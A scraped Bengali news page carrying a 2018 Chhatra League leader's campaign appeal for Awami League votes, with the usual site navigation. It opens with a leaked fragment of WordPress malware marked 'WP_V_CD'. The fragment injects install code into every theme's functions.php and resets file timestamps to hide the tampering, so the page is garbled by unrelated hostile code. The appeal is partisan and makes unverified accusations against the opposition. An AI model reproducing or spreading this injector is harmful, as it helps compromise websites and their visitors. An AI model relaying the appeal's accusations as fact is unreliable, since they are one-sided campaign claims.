if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){ if (strpos($content, 'WP_V_CD') === false){ $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } ?>
নৌকায় ভোট চাইলেন তিতুমীর কলেজ ছাত্রলীগ নেতা হাসানুর রহমান শাওন – সেরা নিউজ ২৪ ডটকম | SeraNews24.Com | সর্বদা সত্যের সন্ধানে
সংবাদ শিরোনাম :
কবি সাজেদুল হকের ” মাছরাঙার শহরে, উড়ে যাওয়া পাখির দূরে যাওয়া শূন্যতা “ শ্রীপুর উপজেলা পরিষদ নির্বাচনে আলহাজ্ব আব্দুল জলিলকে নৌকার প্রার্থী হিসেবে চায় শ্রীপুরবাসী কুষ্টিয়া তে দুই গ্রুপের সংঘর্ষে নিহত ১ কুমারখালী তে বই উৎসব ২০১৯ অনুষ্ঠিত। কুষ্টিয়া -৪ আসনের আওয়ামীলীগের প্রার্থী সেলিম আলতাফ জর্জ বিশাল ব্যবধানে বিজয়ী। নৌকায় ভোট চাইলেন তিতুমীর কলেজ ছাত্রলীগ নেতা হাসানুর রহমান শাওন কুমারখালী উপজেলা পিএসসি পরীক্ষার ২০১৮ পাশের হার ৯৯.৮.৪% কুমারখালীতে সরকার নির্ধারিত মূল্যে চাল সংগ্রহ কার্যক্রম শুভ উদ্বোধন। কুমারখালী বাসীর কাছে নৌকায় ভোট চাইলেন এমপি আব্দুর রউফ । কুমারখালীর উপজেলা সদকী কাঁঠাল ডাঙ্গী গ্ৰামে আ.লীগের কর্মী সমাবেশ অনুষ্ঠিত।
নৌকায় ভোট চাইলেন তিতুমীর কলেজ ছাত্রলীগ নেতা হাসানুর রহমান শাওন

নৌকায় ভোট চাইলেন তিতুমীর কলেজ ছাত্রলীগ নেতা হাসানুর রহমান শাওন

আল্লাহ সর্বশক্তিমান

৩০ ডিসেম্বর একাদশ জাতীয় সংসদ নির্বাচন।
২০০৮ সালের নবম জাতীয় সংসদ নির্বাচনে বাংলাদেশ আওয়ামীলীগের নির্বাচনী ইশতেহারে ডিজিটাল বাংলাদেশ গড়ে তোলার যে প্রতিশ্রুতি দিয়েছলো সামগ্রিকভাবে তার বাস্তবায়ন হয়েছে।

বিগত দশ বছরে আওয়ামীলীগ সরকারের ধারাবাহিক উন্নয়নের ফলে, বাংলাদেশ স্বল্প আয়ের দেশ থেকে বেরিয়ে মধ্যম আয়ের দেশে রুপান্তরিত হয়েছে। দেশের খাদ্য,বস্ত্র,শিল্প,তথ্য প্রযুক্তি,শিক্ষা,চিকিৎসা,যোগাযোগ,বিদুৎ সহ সকল খাতে অভূতপুর্ব সাফল্য অর্জিত হয়েছে। রূপপুর পারমাণবিক বিদুৎ কেন্দ্র,পায়রা সমুদ্র বন্দর, হাইটেক পার্ক, সমুদ্রের তলদেশ দিয়ে কর্ণফুলী চ্যানেল নির্মাণ, সহ আরো অনেক মেগাপ্রকল্পের কাজ চলমান। সমুদ্রবিজয়, ছিটমহল সমস্যা সমাধান আওয়ামীলীগ সরকারের দুইটি বড় অর্জন। রোহিঙ্গা সংকট মোকাবেলায় দেশরত্ন শেখ হাসিনা ” মাদার অফ হিউমিনিটি ” উপাধিতে ভূষিত হন৷ কাওমী শিক্ষার্থীদের দীর্ঘদিনের আন্দোলন সংগ্রামের ফসল কাওমী সনদকে মাস্টার্স এর সমমান প্রদান করেন মাননীয় প্রধানমন্ত্রী শেখ হাসিনা। কোটা প্রথার যৌক্তিক ও সময় উপযোগী সংস্কার প্রজ্ঞাপন আকারে প্রকাশ করা হয় এবং নিরাপদ সড়ক আন্দোলনের শিক্ষার্থীদের সকল দাবীর প্রতি পূর্ণ সমর্থন জানান মাননীয় প্রধানমন্ত্রী, সেই অনুযায়ী শিক্ষার্থীদের দাবী বাস্তবায়নে পদক্ষেপ গ্রহণ করেন।

উন্নয়নের মহাসড়কের পথে আজ বাংলাদেশ। স্যাটেলাইট ও সাবমেরিন যুগে এখন আমাদের প্রিয় মাতৃভূমি। পদ্মাসেতু, মেট্রোরেল, এলিবেটেট এক্সপ্রেস, বিভাগীয় হাইওয়ে মহাসড়কগুলো চারলেনে উন্নয়ন কাজের অগ্রগতি আজ দৃশ্যমান। অচিরেই এই সুবিধাগুলো ভোগ করবে সাধারণ জনগণ।

২০১৮ আসনের একাদশ জাতীয় সংসদ নির্বাচনে আওয়ামীলীগের ইশতেহারের মূল প্রতিপাদ্য হলো ” গ্রাম হবে শহর “৷ শহরাঞ্চলের সকল সুযোগ সুবিধা সবটুকু গ্রামে পৌছে দেয়ায় আওয়ামীলীগের এবারের নির্বাচনী ইশতেহারের লক্ষ্য।

তথাকথিত জাতীয় ঐক্যফ্রন্ট শুধুমাত্র নির্বাচন বানচাল করার উদ্যেশে নিয়েই নির্বাচনে এসেছে তা এখন ধ্রুবতারার মত সত্য। তারা নির্বাচনে নিজেরাই প্রচারণায় অংশ না নিয়ে, জনগণের কাছে না গিয়ে, নির্বাচনে আশানুরুপ ভোট না পেলে আইন শৃঙ্খলা বাহিনী ও সরকারে উপর সব দোষ চাপাবে যা পূর্বপরিকল্পিত। প্রতি নির্বাচনের ন্যায় নির্বাচনে হেরে গেলে ভোট কারচুপির অভিযোগ তুলবে।

যারা পেট্রোল বোমা মেরে মানুষ হত্যার রাজনীতি করে ক্ষমতায় আসতে চায়, যারা উন্নয়ন বলতে খাল কাটাকেই বুঝে,  যারা গণতন্ত্র বলতে তাদের দুর্নীতিবাজ নেত্রীকে জেল থেকে মুক্ত, আর বিদেশ থেকে দুর্নীতির বরপুত্রকে দেশে ফিরিয়ে আনা বুঝে, যারা বাকস্বাধীনতা ও মুক্তচিন্তা বলতে শুধু সরকার বিরোধী  কথাবার্তা বুঝে, যারা শুধু সমালোচনায় বুঝে, ভালো কাজের প্রসংসা করতে কুন্ঠা বোধ করে, যারা যুদ্ধাপরাধী জামায়াত নেতাদের মনোনয়ন দিয়ে আইএসয়াই এবং পাকিস্তানের এজেন্ডা বাস্তবায়নে ব্যস্ত, আমি দৃঢ়ভাবে বিশ্বাস করি বাংলার আপামর জনসাধারণ তাদের পক্ষে রায় দিবেনা।

নির্বাচন দিন সকাল থেকে একটি চক্র নির্বাচনকে প্রশ্নবিদ্ধ করার জন্য সামাজিক যোগাযোগ মাধ্যমে জালভোট হচ্ছে এমন ভুয়া একটি  তথ্য সারাদিনভর প্রচার করতে থাকবে। ইতিপূর্বে সিটি কর্পোরেশন নির্বাচনে ও স্থানীয় সরকার নির্বাচনে দেখা যায়, তারা ভুয়া ব্যালট ছাপিয়ে নৌকায় গনহারে সিল মারতেছে এমন দৃশ্য ধারণ করে সবাইকে বিভ্রান্ত করার চেষ্টা করছে এবং অনেকক্ষেত্রেই তারা এভাবে জনগণের বিশ্বাস অর্জনে সফল হচ্ছে। জাতীয় নির্বাচনে লন্ডন থেকে শত শত কোটি কালো টাকা শুধুমাত্র এইভাবে মঞ্চায়ন করে ভিডিও ধারণ করে সামাজিক যোগাযোগ মাধ্যমে ছড়িয়ে দেয়ার জন্য নির্দেশ এসেছে।  এই ব্যাপারে সবাইকে সজাগ দৃষ্টি রাখার আহবান জানাচ্ছি। কোনপ্রকার গুজবে কান না দেয়ার আহবান জানাচ্ছি। নির্বাচনের দিন কিছু বিচ্ছিন্ন ঘটনা সংগঠিত হয় এ কথাটি সত্যি, কিন্তু সামগ্রিক ফলাফলকে কোনভাবে প্রভাবিত করতে পারে এমন ঘটনা সংগঠিত হয়না।

সর্বোপরি বাঙ্গালী জাতির জনক বঙ্গবন্ধু  শেখ মুজিবুর রহমানের আজন্মলালিত স্বপ্নের সোনার বাংলা বিনির্মাণে অংশ নিতে এবং দেশরত্ন শেখ হাসিনাকে তৃতীয় মেয়াদে রাষ্ট্রীয় ক্ষমতায় আনতে,  ডিসেম্বর স্বাধীনতা ও সার্বভৌমত্বের প্রতীক ” নৌকা ” মার্কায় ভোট দেয়ার আহবান রইলো। নৌকার বিজয় সুনিশ্চিত, ইনশাআল্লাহ।

তরুণ প্রজন্মের প্রথম ভোট, মুক্তিযুদ্ধের পক্ষে হোক।
সকলের সুস্বাস্থ্য ও দীর্ঘায়ু কামনা করি।

জয় বাংলা, জয় বঙ্গবন্ধু
জয়তু শেখ হাসিনা

নিবেদক
মোঃ হাসানুর রহমান শাওন
সরকারি তিতুমীর কলেজ ছাত্রলীগ

ফেসবুক প্রফাইল থেকে সংগ্রহীত।

Print Friendly, PDF & Email

সংবাদটি সম্পর্কে আপনার মতামত ‍লিখুন

দয়া করে নিউজটি শেয়ার করুন...

সংবাদ খুজুন

নামাজের সময়সূচী

সেহরীর শেষ সময় - ভোর ৫:১১
  • ফজর
  • যোহর
  • আছর
  • মাগরিব
  • এশা
  • সূর্যোদয়
  • ভোর ৫:১৬
  • দুপুর ১২:১৬
  • বিকাল ৪:১৯
  • সন্ধ্যা ৬:০০
  • রাত ৭:১৪
  • ভোর ৬:২৮

ফেসবুক গ্রুপ অনুসরন করুনঃ

বিশ্বকাপ ফুটবল ২০১৮ – World Cup Football 2018 – SeraNews24.com
Facebook Group · 35,396 members
 

Join Group

 

প্রতিমুহূর্তের সংবাদ পেতে ভিজিট করুন “সেরা নিউজ ২৪ ডটকম”
www.SeraNews24.com

 About Us     Contact     Privacy & Policy     DMCA     Sitemap

© সর্বস্বত্ব স্বত্বাধিকার সংরক্ষিত সেরা নিউজ টুয়েন্টিফোর ডটকম -২০১৮